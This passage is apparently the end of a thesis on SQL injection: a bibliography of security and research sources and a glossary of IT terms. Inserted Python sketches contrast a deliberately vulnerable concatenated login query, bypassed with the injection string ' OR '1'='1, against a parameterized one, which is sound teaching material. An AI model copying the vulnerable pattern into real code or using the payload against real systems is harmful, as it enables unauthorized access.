Lebowitz, M. The importance of laboratory
experimentation in IS research. 1998. ACM Press.
Communications of the ACM.
Lee, A. S. 1989, "A Scientific Methodology for MIS
Case Studies", MIS Quarterly pp. 33-50.
Linn, C. M., Rajagopalan, M., Baker, S., Collberg, C.,
Debray, S. K., Hartman, J. H., & Moseley, P. A Multi-
Faceted Defence Mechanism Against Code Injection
Attacks. 2004.
http://www.cs.arizona.edu/~linnc/research/CCS2004.pdf. Department of Computer Science, University of
Arizona.
Livshits, V. B. & S.Lam, M. 2005, Finding Security
Vulnerabilities in Java Applications with Static Analysis,
Stanford University,
http://suif.stanford.edu/papers/usenixsec05.pdf.
M.T.Gamble & R.Gamble, M. H. "Understanding
Solution Architecture Concerns", in International
Conference on Software Engineering.
Maor, O. & Shulman, A. 2003, Blindfolded SQL
Injection, Imperva,
http://www.imperva.com/application_defense_center/white_papers/blind_sql_server_injection.html.
Maor, O. & Shulman, A. 2004, SQL Injection
Signatures Evasion, Imperva,
http://packetstormsecurity.com/papers/bypass/SQL_Injection_Evasion.pdf.
McDonagh, J. Investigating the dynamics of IT-enable:
The appeal of clinical inquiry. 2004. Idea group,
Ireland. The handbook of information systems
research.
McDonald, S. 2002, SQL Injection: Modes of attack,
defence, and why it matters
http://www.sans.org/rr/papers/3/23.pdf.
McGovern, J., Tyagi, S., Stevens, M., & Matthew, S.
2003, Java Web Services Architecture Morgan Kaufmann
Publishers.
Melton, J. 1996, "SQL language summary", ACM
Comput.Surv., vol. 28, no. 1, pp. 141-143.
Microsoft. Core Principles of the Dynamic Systems
Initiative. 2005.
http://www.microsoft.com/windowsserversystem/dsi/dsicore.mspx%20.
Microsoft 6 A.D.a, SQL Server 2005 Books OnLine - OLE
DB Provider for Microsoft Directory Services, Microsoft,
http://msdn2.microsoft.com/en-us/library/ms190803.aspx.
Microsoft 6 A.D.b, SQL Server 2005 Books OnLine - OLE
DB Provider for Microsoft Directory Services, Microsoft,
http://msdn2.microsoft.com/en-us/library/ms190803.aspx.
Microsoft 2006, SQL Server 2005 Books Online,
Microsoft,
http://www.microsoft.com/downloads/details.aspx?FamilyID=be6a2c5d-00df-4220-b133-29c1e0b6585f.
Miles, M. B. & Huberman, A. M. 1994, Qualitative
Data Analysis Sage, Thousand Oaks, CA.
Nguyen-Tuong, A., Guarnieri, S., Greene, D., & Evans,
D. 2004, Automatically Hardening Web Applications
Using Precise Tainting, University of Virginia,
http://www.cs.virginia.edu/evans/pubs/infosec05.pdf,
CS-2004-36.
Nonaka, I. & Takeuchi, H. The Knowledge Creating
Company: How Japanese Companies Create the
Dynamics of Innovation. 1995. New York, Oxford
University Press.
O'Brien, L., Bass, L., & Merson, P. 2005, Quality
Attributes and Service-Oriented Architectures, Carnegie
Mellon Software Engineering Institute,
http://www.sei.cmu.edu/publications/documents/05.reports/05tn014/05tn014.html, CMU/SEI-2005-TN-014.
Open Group Architecture Framework. TOGAF 8.1
Enterprise Edition. 2005.
http://www.opengroup.org/bookstore/catalog/g051.htm.
OWASP. The Open Web Application Security Project.
[A guide to building secure Web applications]. 2006.
http://www.owasp.org. Online Documentation.
Pietraszek, T. & Berghe, C. V. "Defending Against
Injection Attacks through Context-Sensitive String
Evaluation", in RAID2005,
http://tadek.pietraszek.org/publications/pietraszek05_defending.pdf.
Racciatti, H. M. 2002, Técnicas de SQL Injection: Un
Repaso www.hackyashira.com.
Saltzer, J. H. & Schroeder, M. D. "The protection of
information in computer systems", in Fourth ACM
Symposium on Operating System, ACM,
http://web.mit.edu/Saltzer/www/publications/protection, pp. 1278-1308.
Sam M.S. 2005, SQL Injection Protection by Variable
Normalization of SQL Statement
http://www.securitydocs.com/pdf/3388.PDF.
Sarker, S. & Lee, A. S. "Using a positivist case research
methodology to test a theory about IT-enabled
business process redesign", in International conference
on Information systems, pp. 237-252.
Saunders, M., Lewis, P., & Thornhill, A. 2003, Research
Methods For Business Students, Third Edition edn,
Pearson Education Limited.
Scott Dawson, Farnam Jahanian, & Todd Mitton 2006,
"Experiments on Six Commercial TCP
Implementations Using a Software Fault Injection
Tool", Software: Practice and Experience, vol. 27, no.
12, pp. 1385-1410.
Scott, D. & Sharp, R. "Abstracting application-level
web security", in 11th international conference on
World Wide Web, ACM Press, pp. 396-407.
SecuriTeam.com 2002, SQL Injection Walkthrough,
SecuriTeam.com,
http://www.securiteam.com/securityreviews/5DP0N1P76E.html.
Spett, K. 2002, Sql Injection: Are Your Web Applications
Vulnerable?
http://www.spidynamics.com/support/whitepapers/WhitepaperSQLInjection.pdf.
SPI Labs 2003, Web Application Security Assessment,
SPI Labs.
The National Center for Education Statistics. The
National Center for Education Statistics Glossary.
2002. http://nces.ed.gov/pubs98/tech/glossary.asp.
2006.
The Radicati Group, I. 2006, Microsoft Exchange
Market Share Statistics, The Radicati Group, Inc,
http://download.microsoft.com/download/E/8/A/E8A154BF-CC35-4340-BD26-6265CDB06B6E/ExStats.doc#_Toc108584507.
Thomas Connolly, Carolyn Begg, & Ann Strachan
1999, Database Systems - A Practical Approach to
Design, Implementation, and Management Addison -
Wesley.
unknown. Hackvideo - SQL-injection. 2005c. e2k.
unknown. Hacking Store via SQL Injection by
(vitamin_fosfat) (b_ice).avi. 2005b. e2k. 5-11-2005b.
unknown 2005a, A Step by Step Guide to SQL Injections
e2k.
Viega, J. & Messier, M. 2004, "Security is Harder than
You Think", Queue, vol. 2, no. 5, pp. 60-65.
W3 Schools 2006, ASP ServerVariables Collection
http://www.w3schools.com/asp/coll_servervariables.asp.
W3C. Web Services Glossary. 2004. Worldwide Web
Consortium.

Waymire, R. Hacking Databases - SQL Injection
Attacks and Common Configuration Mistakes. 2004.
Microsoft. Microsoft Tech-Ed 2004.
Whitman, M. E. & Woszczynski, A. B. The Handbook
of Information Systems Research. 2004. Idea Group
Publishing.
Wikipedia. SQL injection. Wikipedia, the free
encyclopedia . 2006f.
http://en.wikipedia.org/wiki/SQL_injection.
Wikipedia. Legacy system. Wikipedia . 2006e.
Wikipedia. Database. 2006d.
http://en.wikipedia.org/wiki/Database. 2006d.
Wikipedia. SQL. 2006c. 2006c.
Wikipedia. Taxonomy. 2006b.
http://en.wikipedia.org/wiki/Taxonomy.
Wikipedia. Systems architecture. 2006a.
http://en.wikipedia.org/wiki/Systems_architecture,
Wikipedia.
Wixon, D. Qualitative research methods in design and
development. 2[4], 19-26. 1995. ACM Press.
Interactions.
Xu, W., Bhatkar, S., & Sekar, R. 2005, A Unified
Approach for Preventing Attacks Exploiting a Range of
Software Vulnerabilities, Stony Brook.
Yi, H. & Brajendra, P. "A data mining approach for
database intrusion detection", in 2004 ACM symposium
on Applied computing, ACM Press.
Yin, R. K. Case Study Research: Design and Methods.
Revised Edition. 1989. Sage, Beverly Hills, CA.
Yip Chung, C., Lieu, R., Liu, J., Luk, A., Mao, J., &
Raghavan, P. "Thematic mapping - from unstructured
documents to taxonomies", in Conference on
Information and Knowledge Management, ACM Press,
pp. 608-610.
Yuhanna, N. 2003, Nailing Down Four Key DBMS
Security Issues, Forrester Research, Inc.
Yuhanna, N. & Schwaber, C. E. Securing SQL Server
DBMS. 2004. Forrester Research, Inc. Best
Practices.

GLOSSARY
4GL Acronym for Fourth-Generation Programming
Language. A programming language designed with a
specific purpose in mind, such as the development of
commercial business software.
ATM Acronym for Asynchronous Transfer Mode. A
high-bandwidth, high-speed (up to 155 Mbps),
controlled-delay, fixed-size packet switching and
transmission system integrating multiple data types
(voice, video, and data). Its fixed-size packets are
known as "cells" (ATM is often referred to as "cell
relay").
Buffer Overflow This happens when more data is
put into a buffer or holding area than the buffer can
handle, for example because of a mismatch in
processing rates between the producing and consuming
processes, or because the length of the input is not
checked. This can result in system crashes or the
creation of a back door leading to system access.
Cookie A cookie is a small piece of data which is
sent from a Web server to a Web browser and stored
locally on the user's machine. The cookie is stored on
the user's machine but is not an executable program
and cannot do anything to the machine. Whenever a
Web browser requests a file from the same Web
server that sent the cookie, the browser sends a copy
of that cookie back to the server. A cookie can
contain information such as user ID, user preferences,
archived shopping cart information, etc. Cookies can
contain Personally Identifiable Information.
CRM Acronym for customer relationship
management. CRM entails all aspects of interaction a
company has with its customer, whether it be sales or
service related. CRM is an information industry term for
methodologies, software, and usually Internet
capabilities that help an enterprise manage customer
relationships in an organised way.
CVE Acronym for Common Vulnerabilities and
Exposures. CVE is a dictionary-type list of
standardized names for vulnerabilities and other
information related to security exposures. CVE aims
to standardize the names for all publicly known
vulnerabilities and security exposures. The goal of
CVE is to make it easier to share data across separate
vulnerability databases and security tools.
DBA Acronym for database administrator. Person
responsible for system tuning as well as the structure
of the tables within the database, the number of
instances to run, and other parameters.
DCL Acronym for Data Control Language. A
computer language and a subset of SQL, used to
control access to data in a database.
DDL Acronym for Data Definition Language. SQL
statements that can be used either interactively or
within programming language source code to define
databases and their components.
DML Acronym for Data Manipulation Language.
SQL statements that can be used either interactively
or within programming language source code to
retrieve, insert, update, and delete data stored in a
database management system.
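The DCL, DDL and DML entries above can be told apart with a short sketch. It assumes Python's standard sqlite3 module and a hypothetical products table, neither of which comes from the thesis. SQLite has no user accounts, so the DCL statement is shown only as a string and is never executed.

```python
import sqlite3

# In-memory database used purely for illustration.
conn = sqlite3.connect(":memory:")

# DDL: defines the database structure (here, a hypothetical table).
conn.execute(
    "CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)"
)

# DML: inserts, updates, deletes, and retrieves the data itself.
conn.execute("INSERT INTO products (name, price) VALUES (?, ?)", ("widget", 9.5))
conn.execute("INSERT INTO products (name, price) VALUES (?, ?)", ("gadget", 20.0))
conn.execute("UPDATE products SET price = price * 2 WHERE name = ?", ("widget",))
conn.execute("DELETE FROM products WHERE name = ?", ("gadget",))
rows = conn.execute("SELECT name, price FROM products ORDER BY id").fetchall()

# DCL: controls who may access the data. SQLite does not support GRANT or
# REVOKE, so this statement is illustrative only and is not executed;
# report_user is a hypothetical account name.
dcl_example = "GRANT SELECT ON products TO report_user"

print(rows)
```

On a server RDBMS with user accounts, the GRANT statement would be issued by an administrator in the same way as the other statements.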
DoS Acronym for Denial of Service. A type of
attack that tries to block a network service by
overloading the server.
ERP Acronym for Enterprise Resource Planning. An
information system that integrates all manufacturing
and related applications for an entire enterprise.
Ethernet A computer network cabling system
designed by Xerox in the late 1970s. Originally
transmission rates were 3 Megabits per second (Mb/s)
over thick coaxial cable. Media today include fiber,
twisted-pair (copper), and several coaxial cable types.
Rates are up to 10 Gigabits per second or 10,000Mb/s.
Firewall A firewall is a hardware or software
solution to enforce security policies. In the physical
security analogy, a firewall is equivalent to a door lock
on a perimeter door or on a door to a room inside of
the building - it permits only authorized users such as
those with a key or access card to enter. A firewall has
built-in filters that can disallow unauthorized or
potentially dangerous material from entering the
system. It also logs attempted intrusions.
FTP Acronym for File Transfer Protocol. A very
common method of moving files between two
Internet sites. FTP is a way to login to another
Internet site for the purposes of retrieving and/or
sending files. FTP was invented and in wide use long
before the advent of the World Wide Web and
originally was always used from a text-only interface.
Hardening A defence strategy to protect against
attacks by removing vulnerable and unnecessary
services, patching security holes, and securing access
controls.
HTTP Acronym for Hypertext Transfer Protocol. It is
the set of rules for exchanging files (text, graphic
images, sound, video, and other multimedia files) on
the World Wide Web. Relative to the TCP/IP suite of
protocols (which are the basis for information
exchange on the Internet), HTTP is an application
protocol.
HTTPS Acronym for Hypertext Transfer Protocol
Secure. HTTP with SSL encryption for security.
IP Acronym for Internet Protocol. Defines how
information gets sent between servers or systems
across the Internet.
ISO Short name of the International Organization for
Standardization, an international body that develops
and publishes standards. Its members are national
standards bodies (ANSI for the United States), and
its standards are approved through due process and
consensus among those members.
IT Acronym for Information Technology. Includes all
matters concerned with the furtherance of computer
science and technology and with the design,
development, installation, and implementation of
information systems and applications [San Diego State
University].
IT Architecture An integrated framework for
acquiring and evolving IT to achieve strategic goals. It
has both logical and technical components. Logical
components include mission, functional and
information requirements, system configurations, and
information flows. Technical components include IT
standards and rules that will be used to implement the
logical architecture.
Interoperability The ability of two or more
systems or components to exchange information and
to use the information that has been exchanged. For
example, interoperability would be required for a
digital television set to be plugged into a DVD player
that is plugged into cable with all the components
working together.
Kernel The core of an operating system that
handles tasks such as memory allocation, device input
and output, process allocation, security and user
access.
LDAP Acronym for Lightweight Directory Access
Protocol, which defines a standard for organizing
directory hierarchies and interfacing to directory
servers.
MDX Acronym for Multidimensional Expressions, the
multidimensional equivalent of SQL. The language
used to define multidimensional data selections and
calculations in Microsoft’s OLE DB for OLAP API
(Tensor). It is also used as the calculation definition
language in Microsoft’s OLAP Services.
Metadata Data about data. Index-type information
pertaining to the entire data set rather than the
objects within the data set. Metadata is essential for
understanding information stored in databases and has
become increasingly important in XML-based Web
applications.
ODBC Acronym for Open Database Connectivity.
A standardised interface, or middleware, for accessing
a database from a program.
OLAP Acronym for Online Analytical Processing.
On-line retrieval and analysis of data to reveal business
trends and statistics not directly visible in the data
directly retrieved from a data warehouse. Also known
as multidimensional analysis.
OleDb Acronym for Object Linking and Embedding
Database. It is used to implement Microsoft's strategy
of Universal Data Access (UDA) – to access any type
of data from any application (text files, spreadsheets,
email, relational databases, address books) from any
storage device (desktop computer, mainframe,
Internet, etc.).
OLTP Acronym for Online Transaction Processing.
Class of programs that facilitate and manage
transaction-oriented applications, typically for data
entry and retrieval transactions in a number of
industries, including banking, airlines, mail order,
supermarkets, and manufacturers.
OSI Model The seven-layer OSI Reference model
was developed by the ISO subcommittee. The OSI
model serves as a logical framework of protocols for
computer-to-computer communications. Its purpose
is to facilitate the interconnection of networks.
Phishing The act of tricking someone into giving
up confidential information or into doing something
that they normally would not or should not do. For
example: sending an e-mail to a user falsely claiming
to be an established legitimate enterprise in an
attempt to scam the user into surrendering private
information that will be used for identity theft.
Prepared Statements The PREPARE statement
feature supported by many databases, which allows a
client to pre-issue a template SQL query at the
beginning of a session; for the actual queries, the client
only needs to specify the variables that change.
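A minimal sketch of why a prepared (parameterized) query resists injection, assuming Python's standard sqlite3 module; the users table, the sample credentials and the function names are hypothetical and do not come from the thesis. Python's sqlite3 exposes no explicit PREPARE call, so the "?" placeholders stand in for the template-plus-variables idea described above.

```python
import sqlite3


def build_db():
    """Create an in-memory database with a hypothetical users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    return conn


def login_unsafe(conn, name, password):
    # Vulnerable: user input is concatenated into the SQL text, so quotes
    # in the input can change the structure of the query.
    sql = (
        "SELECT COUNT(*) FROM users WHERE name = '" + name
        + "' AND password = '" + password + "'"
    )
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn, name, password):
    # Template query with placeholders: the input is bound as data and
    # is never parsed as SQL.
    sql = "SELECT COUNT(*) FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchone()[0] > 0


conn = build_db()
payload = "' OR '1'='1"  # classic injection string supplied as the password

print(login_unsafe(conn, "alice", payload))  # the WHERE clause is rewritten
print(login_safe(conn, "alice", payload))    # the payload is compared as text
```

With the concatenated query the payload turns the WHERE clause into a condition that is true for every row, so the login succeeds without the real password. With placeholders the same string is compared literally and the login fails.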
RDBMS Acronym for Relational Database
Management System. A software application that
manages a structured collection of information,
automatically maintaining defined data relationships,
which can be accessed by simultaneous users to
update or review data residing in the database.
SQL Acronym for Structured Query Language. A
standard interactive and programming language for
getting information from and updating a database.
Although SQL is both an ANSI and an ISO standard,
many database products support SQL with proprietary
extensions to the standard language. Queries take the
form of a command language.
SSL Acronym for Secure Sockets Layer, a protocol
developed by Netscape for transmitting private
documents via the Internet. SSL uses public-key
cryptography to agree on a session key, which then
encrypts the data transferred over the SSL
connection. Both Netscape Navigator and
Internet Explorer support SSL, and many Web sites
use the protocol to obtain confidential user
information, such as credit card numbers. By
convention, URLs that require an SSL connection start
with https: instead of http:.

Stakeholders Those people and organisations who
may affect, be affected by, or perceive themselves to
be affected by, a decision or activity.
Stored Procedure A set of SQL statements (and
with those RDBMSs that support them, flow-control
statements) that are stored under a procedure name
so that the statements can be executed as a group by
the database server. Some RDBMSs, such as Microsoft
and Sybase SQL Server, precompile stored
procedures so that they execute more rapidly.
Sysadmin The term system administrator
(abbreviation: sysadmin) designates a job position of
engineers involved in computer systems. They are the
people responsible for running the system, or running
some aspect of it.
Transact-SQL A superset of ANSI SQL used by
Microsoft and Sybase SQL Server. Transact-SQL
includes flow-control instructions, and the capability to
define and use stored procedures that include
conditional execution and looping.
Telnet The Internet standard protocol for remote
terminal connection service. TELNET allows a user at
one site to interact with a remote timesharing system
at another site as if the user's terminal was connected
directly to the remote computer.
TCP Acronym for Transmission Control Protocol.
Used along with the Internet Protocol (IP) to send
data in the form of individual units (called packets)
between computers over the Internet. Whereas IP
handles the actual delivery of the data, TCP keeps
track of the packets that a message is divided into for
efficient routing through the Internet.
UDDI Acronym for "Universal Description,
Discovery and Integration". An online directory that
gives businesses and organizations a uniform way to
describe their services, discover other companies'
services and understand the methods required to
conduct business with a specific company.
URI Acronym for "Uniform Resource Identifier".
A formatted string that serves as an identifier for a
resource, typically on the Internet. URIs are used in
HTML to identify the anchors of hyperlinks. URIs in
common practice include Uniform Resource Locators
(URLs)[URL] and Relative URLs [RELURL].
URL An acronym for "Uniform Resource Locator,"
this is the address of a resource on the Internet.
World Wide Web URLs begin with http://.
Web Short for World Wide Web.
Web Page A single document or file on the World
Wide Web, identified by a unique URL.
Web Services A platform-independent standard
based on XML to communicate within distributed
systems. They are loosely coupled and allow short-
term cooperations between services. The main
protocol defining the kind of communication to a web
service is SOAP (Simple Object Access Protocol).
White Hat A Whitehat, also rendered as White hat
or White-hat, is, in the realm of Information
technology, a name that describes a person who is
ethically opposed to the abuse of Computer systems.
Realizing that the Internet now represents human
voices from all around the world makes the defence of
its integrity an important pastime for many. A
Whitehat generally focuses on securing IT Systems
whereas a Blackhat (the opposite) would like to break
into them.
WWW Acronym for World Wide Web. A
hypertext-based, distributed information system
originally created by researchers at CERN, the
European Laboratory for Particle Physics, to facilitate
sharing research information. The Web presents the
user with documents, called web pages, full of links to
other documents or information systems. Selecting
one of these links, the user can access more
information about a particular topic. Web pages
include text as well as multimedia (images, video,
animation, sound).
